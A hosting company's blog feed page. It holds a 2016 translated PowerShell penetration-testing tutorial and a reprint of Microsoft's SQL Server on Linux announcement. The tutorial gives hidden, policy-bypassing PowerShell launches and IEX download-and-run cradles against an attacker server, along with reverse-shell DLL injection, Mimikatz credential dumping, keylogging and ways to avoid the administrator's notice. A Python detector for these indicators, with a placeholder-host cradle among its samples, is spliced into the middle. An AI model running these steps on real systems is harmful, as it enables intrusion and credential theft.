Microsoft | 捕夢網 Blog (https://blog.pumo.com.tw): network security, information security services, cloud hosting, server rental, server colocation, virtual hosting and website hosting experts

[Technical Share] PowerShell, a Sharp Tool for Penetration Testing
https://blog.pumo.com.tw/archives/755
Mon, 17 Oct 2016 06:15:46 +0000

Introduction

PowerShell is the command-line shell and scripting environment of Microsoft Windows. It offers remarkable flexibility and functionality for managing Windows systems, and it is now present on essentially every Windows system. It is precisely this power that lets us put it to use in penetration testing.

 

What makes PowerShell stand out

1. Code runs in memory and need not touch the disk

2. Code can be downloaded from another system and executed

3. Many security products do not detect PowerShell activity

4. cmd.exe is often blocked from running, but PowerShell is not

 

PowerShell versions shipped with each Windows release


http://p5.qhimg.com/t0195b15357de4adf51.png

 

PowerShell run options

The following are the powershell.exe run options we need most often during a penetration test:

-WindowStyle Hidden    hide PowerShell's own window

-ExecutionPolicy Bypass    bypass the execution policy

By default, PowerShell scripts cannot be run from cmd or by double-clicking; this option lets us get around that restriction.

 

PowerSploit

PowerSploit is a security project on GitHub containing many PowerShell attack scripts, mainly used during penetration tests for reconnaissance, privilege escalation and persistence.

Project URL: https://github.com/PowerShellMafia/PowerSploit

 

 

I. Code execution (CodeExecution)

1. Invoke-DllInjection 

2. Invoke-ReflectivePEInjection

3. Invoke-Shellcode

4. Invoke-WmiCommand

II. Script modification (ScriptModification)

1. Out-EncodedCommand

2. Out-CompressedDll

3. Out-EncryptedScript

4. Remove-Comments

III. Persistence (Persistence)

1. New-UserPersistenceOption

2. New-ElevatedPersistenceOption

3. Add-Persistence

4. Install-SSP

5. Get-SecurityPackages

IV. Antivirus bypass (AntivirusBypass)

Find-AVSignature

V. Information collection (Exfiltration)

This folder is mainly for collecting information from the target host.

VI. Reconnaissance (Recon)

This folder is mainly for reconnaissance of other internal hosts, using the target host as a pivot.

 

Setting up a PowerSploit script server

1. Download PowerSploit to the server

http://p2.qhimg.com/t018218ace50f435af5.png

2. Start Apache

http://p7.qhimg.com/t01fc5b49f2d5b5aa6d.png

3. Check that the server is up

http://p5.qhimg.com/t01005c4c68da223f6f.png

 

Practical use

Space does not allow a detailed introduction of every script, so here we cover the scripts most commonly used in practice.

Remote download and execution with IEX:

IEX (New-Object Net.WebClient).DownloadString("<script URL>")
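Seen from the defender's side, the run options above and the IEX download cradle are exactly what process-creation logging with command-line auditing records. The following is an added example, not code from the original post or from PowerSploit: it scores command lines against those indicators, decoding an -EncodedCommand payload first so that an encoded cradle is not missed. The sample lines and the 198.51.100.7 host are constructed; the abbreviated option forms are the ones powershell.exe accepts.

```python
import base64
import re

# Patterns for the launch options and download cradle described above. The short
# forms (-w, -ep, -exec, -e/-ec/-enc) are abbreviations powershell.exe accepts;
# the cradle pattern allows IEX and DownloadString in either order.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in\w*)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{8,})", re.I),
    "download_cradle": re.compile(
        r"(?:\biex\b|invoke-expression).*downloadstring\s*\("
        r"|downloadstring\s*\(.*(?:\biex\b|invoke-expression)", re.I | re.S),
}

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or '' if none/undecodable."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # truncated or non-UTF-16 payload: still flagged as encoded

def analyze(cmdline):
    """Return (verdict, sorted indicator names) for one process command line."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + decoded  # scan the decoded payload as well
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    if "download_cradle" in hits or len(hits) >= 2:
        return "alert", hits
    if hits:
        return "review", hits  # -ExecutionPolicy Bypass alone is common in admin scripts
    return "benign", hits

# Constructed sample command lines (not taken from the post), modelled on what a
# process-creation log with command-line auditing would record; 198.51.100.7 is
# a placeholder host.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x.ps1')"
SAMPLES = [
    'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "'
    "IEX(New-Object Net.WebClient).DownloadString('http://192.168.6.133/PowerSploit/Privesc/PowerUp.ps1')\"",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    "powershell.exe -w hidden -ep bypass -enc "
    + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii"),
]
```

analyze() returns the verdict together with the indicators that matched, so the same function can be run over SAMPLES or over real command lines exported from a SIEM.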

Getting a shell:

1. Invoke-DllInjection

Injects a DLL file into the current process.

First we generate a reverse-connection DLL payload

http://p1.qhimg.com/t01e6c16b68d04c72ad.png

Save msf.dll locally on the target machine

http://p0.qhimg.com/t01754bd9980fba6681.png

We download the Invoke-DllInjection script

http://p7.qhimg.com/t01fa1d19692685aae9.png

Start a hidden process and inject the reverse-shell DLL into it

http://p1.qhimg.com/t01e86a2f91a359d579.png

We can see that the Meterpreter session has been established

http://p8.qhimg.com/t01a9823d4cf08129a5.png

2. Invoke-Shellcode

Injects shellcode into the current process.

Calling Windows APIs from PowerShell is very convenient, so shellcode can also be executed directly. PowerSploit ships some shellcode as well; see the figure below:

http://p2.qhimg.com/t01184fbc918ceb5364.png

 

Expanding the foothold: internal network port scanning

1. First we download Invoke-Portscan

http://p5.qhimg.com/t01504eaf794aeb0fe5.png

2. Results

http://p0.qhimg.com/t012a419f8dcb079a59.png

 

Obtaining host passwords

To avoid being noticed by the administrator we must not add any accounts on the target machine; instead we obtain the administrator's password in order to keep our access. For this we use the Invoke-Mimikatz script; note that it requires administrator privileges.

1. Download the script

http://p3.qhimg.com/t01a096e94f7be65af7.png

2. Dump the credentials

Invoke-Mimikatz -DumpCreds

http://p4.qhimg.com/t01a4d67a045e8aecfc.png

Another big gun: keylogging

http://p0.qhimg.com/t0160f7ce69b7f027a7.png

Once started it logs keystrokes, and not only keyboard input but mouse input as well, each with a detailed timestamp. In real use we run it in the background.

 

Vulnerability detection: while the attack is in progress

Download the script:

IEX(New-Object Net.WebClient).DownloadString("http://192.168.6.133/PowerSploit/Privesc/PowerUp.ps1")

Invoke-AllChecks: lists the vulnerabilities it can identify

http://p8.qhimg.com/t01e35e708a57173d2d.png

 

Self-study guide: Get-Help

There are many scripts and it is hard to introduce them one by one; the rest you will have to try for yourself. Usage tutorials are practically impossible to find online, so you need to pull up the built-in help information and learn from that.

Take Invoke-DllInjection as an example.

Download the script:

IEX(New-Object Net.WebClient).DownloadString("http://192.168.6.133/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")

Get the help information:

Get-Help Invoke-DllInjection

http://p0.qhimg.com/t01753e3e96af70fd2b.png

View the examples:

Get-Help Invoke-DllInjection -Examples

http://p8.qhimg.com/t0163d0260b2de7f2d7.png

View the detailed information:

Get-Help Invoke-DllInjection -Detailed

http://p7.qhimg.com/t01d76103ae9027a03f.png

 

Conclusion

PowerShell really is extremely powerful and deserves to be called a sharp tool for internal-network penetration. We will keep studying it in depth; in the next article we will no longer be relying on other people's scripts. The purpose of this article is mainly to point the way; you still need to use it and practise a lot to apply it flexibly in real engagements.

Source: http://bobao.360.cn/learning/detail/3104.html

Image source: https://pixabay.com/

Announcing SQL Server on Linux
https://blog.pumo.com.tw/archives/383
Thu, 10 Mar 2016 03:31:49 +0000

In short, MSSQL will be able to run on Linux in the future.

Microsoft is moving from a closed mindset to an open attitude that embraces the world;

the change in its product lineup already gives a glimpse of this.

Azure supported Linux from the day it launched,

and products such as Office 365 can be installed on mobile platforms like iOS and Android.

Microsoft is gradually changing :)

[Image: SQL Server loves Linux]

It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers:

  • Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection
  • In-memory database support for every workload with performance increases up to 30-100x
  • Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and as of March 7, the #1 SAP SD Two-Tier performance benchmark on Windows¹
  • Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices
  • Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data
  • Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility

These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform.

Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms.

[Image: Gartner Magic Quadrants]

Extending SQL Server to Also Now Run on Linux

Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017.

SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in.

“This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.”

“SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.”

“We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.”

Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we also announced Microsoft R Server, our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata.

The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market.

Please join me, Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data.

Thanks,
Scott

To find out more about SQL Server on Linux, you can sign up to get regular updates and provide input to the team.

¹ Benchmark Certification #2016002: Two-tier configured SAP SD Standard Application Benchmark. Using SAP ERP 6.0 Enhancement Package 5, achieving the results of 100000 SD benchmark users using HPE Integrity Superdome X, 16 processors/288 cores/576 threads Intel E7-8890 v3 with 4096GB of main memory. Operating System: Windows Server 2012R2 with SQL Server 2014 Enterprise Edition as DBMS. For more details see: http://www.sap.com/benchmark.

[1] Gartner, “Magic Quadrant for Operational Database Management Systems,” by Donald Feinberg, Merv Adrian, Nick Heudecker, October 2015
[2] Gartner, “Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics,” by Roxane Edjlali and Mark Beyer, February 2016
[3] Gartner, “Magic Quadrant for Business Intelligence and Analytics Platforms,” by Josh Parenteau, Rita L. Sallam, Cindi Howson, Joao Tapadinhas, Kurt Schlegel, Thomas W. Oestreich, February 2016
[4] Gartner, “Magic Quadrant for Advanced Analytics Platforms,” by Lisa Kart, Gareth Herschel, Alexander Linden, Jim Hare, February 2016

The above graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Source: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/

Image source: https://pixabay.com/
